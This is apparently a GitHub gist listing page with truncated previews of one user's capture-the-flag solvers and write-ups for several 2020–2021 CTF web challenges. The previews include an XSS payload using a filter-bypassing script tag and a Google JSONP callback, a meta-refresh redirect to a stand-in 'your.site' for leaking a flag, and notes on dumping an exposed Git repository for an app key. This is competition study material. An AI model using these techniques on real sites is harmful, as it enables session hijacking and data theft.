Jorge jorgectf

jorgectf / LineCTF_2021_Your-Notes.py
Last active Mar 21, 2021
Line's CTF Your Notes solver.
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import random, string, subprocess
def random_string(length):
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
jorgectf / NahamConCTF_2021_AgentTester.py
Last active Mar 15, 2021
NahamCon CTF's AgentTester solver.
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import random, string
import requests
def random_string(length):
jorgectf / AeroCTF_2021_Not-received-points.md
Last active Mar 1, 2021
AeroCTF 2021's "Not received points" solution.

Void _.escape

// this turns the client-side function that escaped our input into a no-op
_.escape = function(s) {return s}

Leak flag image uri

// XSS through JSONP from accounts.google.com
<scr<script>ipt src="https://accounts.google.com/o/oauth2/revoke?callback=(function(){
jorgectf / CybexCTF_2021_WaloW3b.html
Last active Feb 15, 2021
CybexCTF 2021's WaloW3b solver.
<html>
<head>
<meta charset="UTF-8">
</head>
<body>
<script>
const localURL = "https://127.0.0.1:4000"
jorgectf / ql.json
Last active Dec 25, 2020
VSCode's CodeQL Snippets
{
// https://code.visualstudio.com/docs/editor/userdefinedsnippets
/*"For Loop": {
"prefix": ["for", "for-const"],
"body": ["for (const ${2:element} of ${1:array}) {", "\t$0", "}"],
"description": "A for loop."
}*/
"Metadata": { // https://codeql.github.com/docs/writing-codeql-queries/metadata-for-codeql-queries/
jorgectf / DefCamp_2020.md
Last active Dec 8, 2020
Solution for some DefCamp 2020 CTF's Web challenges.

environ

A Git repository was exposed under /backup (dumpable by replacing .git with backup in GitTools' Dumper). Inside the repo, the source code could be read from the commit history (git show HEAD~3), and so could the APP_KEY (git show HEAD~1).

Entry point:

<?php

namespace App\Http\Controllers;

use Illuminate\Http\Request;
jorgectf / DragonSector_2020_Scratchpad.html
Last active Dec 24, 2020
Solution for DragonSector 2020 CTF's ScratchPad challenge.
<!-- Note's content forcing a redirection in 0 seconds to the supplied URL -->
<meta http-equiv="refresh" content="0; url=http://your.site/contentBelow">
<!-- Iterating over the alphabet to query a match (regex) to the iterated letter in order to wrap script's onload event (will be executed if the page is loaded correctly a.k.a no 404 status code) and append working letter to the 'known' flag -->
<html>
<body>
<script>
let known = encodeURIComponent("^DrgnS{NoSameSiteCookiesByDefault\\?!}$");
let iterator = 0;